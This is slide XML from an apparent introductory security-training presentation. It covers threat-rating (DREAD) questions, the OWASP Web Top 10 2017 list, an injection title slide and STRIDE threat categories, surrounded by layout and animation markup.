        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1388533" y="8048977"/>
            <a:ext cx="557672" cy="650241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="557671" cy="650240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1347" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="557672" cy="650241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="000000"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CECECE"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1348" name="7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="108999" y="12445"/>
              <a:ext cx="339673" cy="625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ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr defTabSz="1300480">
                <a:defRPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="990033"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>7</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310"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131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334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1334"/>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1316"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1316"/>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1322"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1322"/>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9" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1328"/>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9" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1340"/>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ID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1346"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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28" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1322" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1340" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1310" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1316" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1334" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1346" grpId="7"/>
    </p:bldLst>
  </p:timing>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1" name="Holistic Approach to Security"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334346" y="110631"/>
            <a:ext cx="10512214" cy="973103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Holistic Approach to Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1352" name="“Security is only as good as the weakest link”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345635" y="4596835"/>
            <a:ext cx="10439966" cy="6253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indent="4762" algn="l" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr i="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr i="0" sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="3400"/>
              <a:t>“Security is only as good as the weakest link”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1353" name="Link_BrokenLink01" descr="Link_BrokenLink01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6834293" y="5581226"/>
            <a:ext cx="2162952" cy="1070188"/>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5" name="Rate the Threats"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="325119"/>
            <a:ext cx="13004800" cy="1770099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rate the Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356" name="Damage potential:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817315" y="2167468"/>
            <a:ext cx="11379201" cy="7152639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:endParaRPr b="1" sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="857250" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2800"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>amage potential: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1219200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>How great is the damage if the vulnerability is exploited? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="857250" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2800"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>eproducibility: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1219200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>How easy is it to reproduce the attack? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="857250" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2800"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>xploitability: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1219200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>How easy is it to launch an attack? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="857250" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2800"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>ffected users: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1219200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>As a rough percentage, how many users are affected? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="857250" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2800"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>iscoverability: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1219200">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>How easy is it to find the vulnerability? </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0" name="OWASP Web Top 10 2017"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390595"/>
            <a:ext cx="11704322" cy="1126632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OWASP Web Top 10 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1361" name="Injection Flaws…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1029546" y="1955195"/>
            <a:ext cx="10945708" cy="6523022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Broken Authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Insecure Deserialisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Using components with known Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="827314" indent="-827314" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Insufficient Logging and Monitoring</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>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3" name="A1 : Injection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A1 : Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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66" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="42545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4" name="STRIDE"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>STRIDE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Spoofing…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2926079"/>
            <a:ext cx="11704322" cy="6502401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Forging an identity of a service or user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Tampering</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Compromising integrity of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Repudiation</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Can’t prove an action committed by an entity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Information Disclosure</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Unintended disclosure of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Denial of Service</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Compromising availability of a service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Elevation of Privileges</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
